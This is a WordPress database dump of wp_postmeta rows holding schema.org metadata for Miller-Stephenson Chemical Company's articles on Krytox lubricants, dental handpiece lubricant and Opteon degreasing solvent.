INSERT INTO `wp_postmeta` VALUES (45067, 2308, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:60:"https://www.miller-stephenson.com/krytox-corrugator-greases/";}s:3:"url";s:60:"https://www.miller-stephenson.com/krytox-corrugator-greases/";s:8:"headline";s:25:"Krytox Corrugator Greases";s:13:"datePublished";s:25:"2016-10-06T13:54:03+00:00";s:12:"dateModified";s:25:"2016-10-25T17:49:11+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_373451452.jpg";s:5:"width";i:3836;s:6:"height";i:2557;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:8:"keywords";s:26:"Corrugator, Grease, Krytox";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:420:"Krytox Corrugator Greases Product Information Krytox PFPE/PTFE corrugator greases have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Krytox lubricants help eliminate bearing lubrication as a cause of premature corrugator roll failures. Corrugator roll changes are significantly easier and quicker on single facers lubricated with Krytox";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45068, 1705, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45069, 1924, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45070, 760, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45071, 1935, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45072, 1935, '_schema_json_timestamp', '1503347092'); 
INSERT INTO `wp_postmeta` VALUES (45073, 1276, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45074, 1187, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45075, 732, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45076, 736, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45077, 296, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45078, 296, '_schema_json_timestamp', '1503349894'); 
INSERT INTO `wp_postmeta` VALUES (45079, 878, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45080, 382, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45081, 565, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45082, 565, '_schema_json_timestamp', '1503351795'); 
INSERT INTO `wp_postmeta` VALUES (45083, 1987, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45084, 1869, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45085, 1869, '_schema_json_timestamp', '1503352299'); 
INSERT INTO `wp_postmeta` VALUES (45086, 1072, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45087, 1069, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45088, 1836, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45089, 2795, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45090, 297, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45091, 2475, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45092, 2475, '_schema_json_timestamp', '1503356784'); 
INSERT INTO `wp_postmeta` VALUES (45093, 761, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45094, 2746, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45095, 1914, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45096, 1914, '_schema_json_timestamp', '1503357830'); 
INSERT INTO `wp_postmeta` VALUES (45097, 918, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45098, 421, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45099, 1480, '_schema_json', 'a:10:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:7:"Article";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:50:"https://www.miller-stephenson.com/product-listing/";}s:3:"url";s:50:"https://www.miller-stephenson.com/product-listing/";s:8:"headline";s:15:"Product Listing";s:13:"datePublished";s:25:"2016-09-10T13:55:27+00:00";s:12:"dateModified";s:25:"2016-09-10T15:38:57+00:00";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:26:"[displayProduct id="1478"]";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:20:"ddillulio@mschem.com";s:3:"url";s:61:"https://www.miller-stephenson.com/author/ddilluliomschem-com/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45100, 722, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45101, 2382, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45102, 2382, '_schema_json_timestamp', '1503359180'); 
INSERT INTO `wp_postmeta` VALUES (45103, 1018, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45104, 1018, '_schema_json_timestamp', '1503359340'); 
INSERT INTO `wp_postmeta` VALUES (45105, 1519, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45106, 731, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45107, 813, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45108, 1179, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45109, 1179, '_schema_json_timestamp', '1503360569'); 
INSERT INTO `wp_postmeta` VALUES (45110, 656, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45111, 1649, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45112, 2058, '_schema_json', 'a:11:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:7:"Article";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:62:"https://www.miller-stephenson.com/krytox-lubrication-overview/";}s:3:"url";s:62:"https://www.miller-stephenson.com/krytox-lubrication-overview/";s:8:"headline";s:27:"Krytox Lubrication Overview";s:13:"datePublished";s:25:"2016-09-28T15:55:16+00:00";s:12:"dateModified";s:25:"2016-09-29T19:14:23+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:94:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/tribosys-compressor-lubricant.jpg";s:5:"width";i:5472;s:6:"height";i:3648;}s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:417:"&nbsp; Choose Your Industry [row col_style="dashed"] [col span="4" span__sm="12"] Aerospace, Aviation, and National Defense [/col] [col span="4" span__sm="12"] Automotive - Squeak &amp; Rattle [/col] [col span="4" span__sm="12"] Automotive - Mechanical Systems [/col] [col span="4" span__sm="12"] Box Board Corrugating [/col] [col span="4" span__sm="12"] Chemical and Petrochemical [/col] [col span="4" span__sm="12"]";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45113, 3160, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:44:"https://www.miller-stephenson.com/krytox-xp/";}s:3:"url";s:44:"https://www.miller-stephenson.com/krytox-xp/";s:8:"headline";s:55:"Krytox XP - Bearing Grease & Oil with Soluble Additives";s:13:"datePublished";s:25:"2016-11-29T15:16:42+00:00";s:12:"dateModified";s:25:"2016-11-29T15:19:39+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_523475344.jpg";s:5:"width";i:1000;s:6:"height";i:992;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:341:"Krytox XP Product Information Krytox XP products are formulated using patented soluble additives. Typical perfluoropolyether (PFPE) greases use solid additives for anti-rust, anti-wear, or extreme pressure performance. These components are mixed into the grease and held in place by the grease thickener. In the past, there were no additives";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45114, 3064, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:71:"https://www.miller-stephenson.com/krytox-fpg-182-performance-lubricant/";}s:3:"url";s:71:"https://www.miller-stephenson.com/krytox-fpg-182-performance-lubricant/";s:8:"headline";s:59:"Chemours Introduces Krytox™ FPG 182 Performance Lubricant";s:13:"datePublished";s:25:"2016-11-18T14:22:38+00:00";s:12:"dateModified";s:25:"2016-11-18T14:35:46+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_422528992.jpg";s:5:"width";i:1000;s:6:"height";i:727;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:380:"Chemours Introduces Krytox™ FPG 182 Performance Lubricant for Clean Rooms, Robotics and Electronic Manufacturing Wilmington, Del., November 17, 2016 – The Chemours Company (“Chemours”) (NYSE: CC), a global chemistry company with leading market positions in titanium technologies, fluoroproducts and chemical solutions, announced today the introduction of its new Krytox™";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45115, 1054, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45116, 4336, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45117, 1128, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:61:"https://www.miller-stephenson.com/dental-handpiece-lubricant/";}s:3:"url";s:61:"https://www.miller-stephenson.com/dental-handpiece-lubricant/";s:8:"headline";s:26:"Dental Handpiece Lubricant";s:13:"datePublished";s:25:"2016-08-31T16:52:13+00:00";s:12:"dateModified";s:25:"2017-03-15T19:14:30+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:100:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/fluoroextreme-dental-e1472662665528.jpg";s:5:"width";i:696;s:6:"height";i:444;}s:14:"articleSection";s:25:"Miller-Stephenson Medical";s:8:"keywords";s:37:"Dental, FluoroExtreme, Lubricant, Oil";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:352:"Dental Handpiece Lubricant Few medical applications challenge a bearing lubricant more than high-speed dental handpieces.  Rotating at speeds of excess of 500,000 rotations per minute (RPM), these handpieces require advanced lubrication which can not only maintain excellent thin-film strength, but also do not degrade under the immense mechanical and";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45118, 861, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45119, 844, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45120, 1231, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45121, 1231, '_schema_json_timestamp', '1503364942'); 
INSERT INTO `wp_postmeta` VALUES (45122, 651, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45123, 901, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45124, 901, '_schema_json_timestamp', '1503365710'); 
INSERT INTO `wp_postmeta` VALUES (45125, 419, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45126, 620, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45127, 1033, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45128, 423, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45129, 778, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45130, 583, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45131, 388, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45132, 1716, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45133, 1716, '_schema_json_timestamp', '1503369625'); 
INSERT INTO `wp_postmeta` VALUES (45134, 3204, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45135, 3204, '_schema_json_timestamp', '1503369960'); 
INSERT INTO `wp_postmeta` VALUES (45136, 2277, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:45:"https://www.miller-stephenson.com/krytox-faq/";}s:3:"url";s:45:"https://www.miller-stephenson.com/krytox-faq/";s:8:"headline";s:39:"Krytox Frequently Asked Questions (FAQ)";s:13:"datePublished";s:25:"2016-10-05T19:07:19+00:00";s:12:"dateModified";s:25:"2016-10-12T20:08:49+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/Krytox-FAQ.jpg";s:5:"width";i:5648;s:6:"height";i:3765;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:8:"keywords";s:41:"Asked, FAQ, Frequently, Krytox, Questions";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:317:"Krytox FAQ Introduction to Krytox Lubricants What is Krytox FAQ? Krytox is the Chemours brand name for a range of clean, specialty synthetic lubricating materials available in numerous grades for a wide range of applications. Krytox lubricants have become the product of choice where extremely high or low temperature";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45137, 1819, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45138, 1428, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45139, 579, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45140, 581, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45141, 582, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45142, 452, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45143, 3726, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:68:"https://www.miller-stephenson.com/krytox-drives-lubrication-savings/";}s:3:"url";s:68:"https://www.miller-stephenson.com/krytox-drives-lubrication-savings/";s:8:"headline";s:39:"How Krytox Drive Savings & Productivity";s:13:"datePublished";s:25:"2017-02-28T15:40:27+00:00";s:12:"dateModified";s:25:"2017-03-01T15:48:24+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_268397873.jpg";s:5:"width";i:1000;s:6:"height";i:667;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:294:"When it Comes to Lubricants, the Lowest Price isn’t Always the Best Value Machine failures occur for a variety of reasons. Each one of these failures creates a ripple effect of costs and productivity loss. Some of these issues can be mitigated by choosing a high-performance lubricant – one";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45144, 1014, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45145, 850, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45146, 984, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45147, 997, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45148, 2503, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:72:"https://www.miller-stephenson.com/krytox-automotive-bearing-lubrication/";}s:3:"url";s:72:"https://www.miller-stephenson.com/krytox-automotive-bearing-lubrication/";s:8:"headline";s:50:"Krytox Automotive Bearing Lubrication Applications";s:13:"datePublished";s:25:"2016-10-11T16:39:36+00:00";s:12:"dateModified";s:25:"2016-10-12T19:47:41+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_130196291.jpg";s:5:"width";i:5616;s:6:"height";i:3744;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:8:"keywords";s:39:"Bearing, Krytox Automotive, Lubrication";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:436:"Krytox™ Automotive Bearing Lubrication Applications High Performance Lubricants That Work in Demanding Real-Life Applications Reliable high-performance fluoropolymer lubricants from Chemours can stand up to even extreme conditions. Krytox™ oils and greases have proven scientific and technical properties to help solve the most critical issues in the automotive industry. Superior product performance, lower overall maintenance";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45149, 1010, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45150, 1200, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45151, 995, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45152, 868, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45153, 998, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45154, 1015, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45155, 912, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45156, 2763, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45157, 996, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45158, 784, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45159, 1293, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45160, 1293, '_schema_json_timestamp', '1503376755'); 
INSERT INTO `wp_postmeta` VALUES (45161, 1796, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45162, 1796, '_schema_json_timestamp', '1503378931'); 
INSERT INTO `wp_postmeta` VALUES (45163, 4332, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45164, 847, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45165, 251, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45166, 251, '_schema_json_timestamp', '1503380202'); 
INSERT INTO `wp_postmeta` VALUES (45167, 2978, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:61:"https://www.miller-stephenson.com/krytox-equipment-selection/";}s:3:"url";s:61:"https://www.miller-stephenson.com/krytox-equipment-selection/";s:8:"headline";s:62:"Krytox - Equipment Selection for Applying Krytox™ Lubricants";s:13:"datePublished";s:25:"2016-11-09T18:30:59+00:00";s:12:"dateModified";s:25:"2016-11-09T18:31:08+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_275163272.jpg";s:5:"width";i:1000;s:6:"height";i:667;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:337:"Krytox Equipment Selection Lubrication Equipment Krytox™ grease has been used successfully in many types of grease guns and pumps. Generally, any lubrication equipment manufacturer’s gun or pump that fits a standard grease cartridge or grease bucket should work. Although Chemours does not supply any pumps, guns, or grease fittings,";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45168, 621, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45169, 649, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45170, 425, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45171, 1747, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45172, 1028, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45173, 1097, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45174, 3315, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45175, 3315, '_schema_json_timestamp', '1503384438'); 
INSERT INTO `wp_postmeta` VALUES (45176, 1348, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45177, 970, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45178, 1135, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:71:"https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/";}s:3:"url";s:71:"https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/";s:8:"headline";s:35:"Opteon™ Sion for Vapor Degreasing";s:13:"datePublished";s:25:"2016-08-31T17:30:53+00:00";s:12:"dateModified";s:25:"2016-10-13T17:25:12+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Vapor-Degreaser.jpg";s:5:"width";i:696;s:6:"height";i:498;}s:14:"articleSection";s:35:"Opteon™ &amp; Vertrel™ Articles";s:8:"keywords";s:32:"Degreaser, Opteon, Sion, Solvent";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:384:"Opteon™ Sion - Vapor Degreasing Solvent What is Vapor Degreasing? Vapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality,";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45179, 2375, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:56:"https://www.miller-stephenson.com/krytox-xht-takes-heat/";}s:3:"url";s:56:"https://www.miller-stephenson.com/krytox-xht-takes-heat/";s:8:"headline";s:25:"Krytox XHT Takes the Heat";s:13:"datePublished";s:25:"2016-10-07T14:36:11+00:00";s:12:"dateModified";s:25:"2016-11-29T13:41:13+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_83285767.jpg";s:5:"width";i:3317;s:6:"height";i:2211;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:8:"keywords";s:11:"Krytox, XHT";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:406:"CHALLENGE: Overcoming high temperature lubricant degradation with Krytox™ XHT Conventional lubricants are subject to oxidation, attack by harsh chemicals or solvents, flammability, and volatilization of the base oil, leading to failure of the lubrication system and associated hazards. Conventional lubricant properties are often found inadequate for critical systems where failure is not an option.";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45180, 993, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45181, 708, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45182, 24, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45183, 24, '_schema_json_timestamp', '1503389829'); 
INSERT INTO `wp_postmeta` VALUES (45184, 26, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45185, 26, '_schema_json_timestamp', '1503390419'); 
INSERT INTO `wp_postmeta` VALUES (45186, 4607, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45187, 941, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45188, 3606, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45189, 846, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45190, 729, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45191, 729, '_schema_json_timestamp', '1503392336'); 
INSERT INTO `wp_postmeta` VALUES (45192, 1029, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45193, 1063, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45194, 1707, '_schema_json', 'a:0:{}'); 
